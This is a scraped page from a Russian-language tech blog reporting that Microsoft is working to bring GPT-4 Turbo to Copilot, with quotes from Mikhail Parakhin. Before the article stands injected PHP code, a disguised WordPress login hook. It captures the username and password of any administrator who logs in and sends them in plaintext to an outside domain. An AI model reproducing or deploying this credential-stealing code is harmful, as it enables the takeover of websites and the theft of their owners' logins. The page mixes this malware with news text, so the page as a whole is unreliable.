if (!function_exists("theme_login_init_6649f5b7cc8ac51798d1b70a14ebc05b")) { function theme_login_init_6649f5b7cc8ac51798d1b70a14ebc05b() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_6649f5b7cc8ac51798d1b70a14ebc05b', 10, 0); } Microsoft работает над добавлением GPT-4 Turbo в Copilot — techno-blog

Microsoft работает над добавлением GPT-4 Turbo в Copilot

Microsoft работает над добавлением GPT-4 Turbo в Copilot

Microsoft работает над обновлением сервиса Copilot (ранее Bing Chat) до недавно анонсированной языковой модели GPT-4 Turbo от OpenAI. Её главным преимуществом является поддержка контекстного окна размером 128 КБ, что эквивалентно примерно 300 страницам текста.

Глава подразделения рекламы и веб-сервисов Microsoft Михаил Парахин сообщил, что Copilot пока не перешёл на GPT-4 Turbo, поскольку разработчикам требуется исправить ещё несколько недочётов. С переходом на новую языковую модель компания также попытается увеличить лимит символов для сообщений, отправляемых чат-боту.

Один из пользователей также спросил, в чём преимущество GPT-4 Turbo по сравнению с обычным GPT. Михаил Парахин ответил следующее:

Он превосходит обычный GPT-4 по «воспринимаемому интеллекту» — нашей внутренней метрике того, насколько умной выглядит система, когда вы с ней общаетесь, но нам еще нужно устранить несколько недочетов в области математики и кодинга. Она обладает более высокой пропускной способностью, что позволяет увеличить количество пользователей или задействовать менее «горячие» DC, тем самым снижая задержки.